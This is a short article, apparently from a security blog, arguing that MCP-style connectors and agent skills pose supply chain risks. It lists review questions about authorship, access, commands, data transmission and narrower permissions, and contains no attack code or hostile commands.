AI Security ยท Supply Chain
MCPs And Agent Skills Are A Supply Chain Problem
Useful automation still needs provenance, review, least privilege, and an assumption that helpful tools can be hostile.
Agent skills and MCP-style connectors are powerful because they let people package repeatable workflows. That same packaging makes them easy to trust too quickly.
This feels familiar. Security teams already learned painful lessons from dependencies, shell scripts, browser extensions, and CI plugins. A useful tool can still be a risky tool.
The review questions are not exotic:
- Who wrote this?
- What can it access?
- What commands can it run?
- What data can it transmit?
- Can the behavior change after approval?
- Is there a narrower way to grant the same capability?
The point is not to avoid automation. The point is to make useful automation reviewable, observable, and appropriately constrained.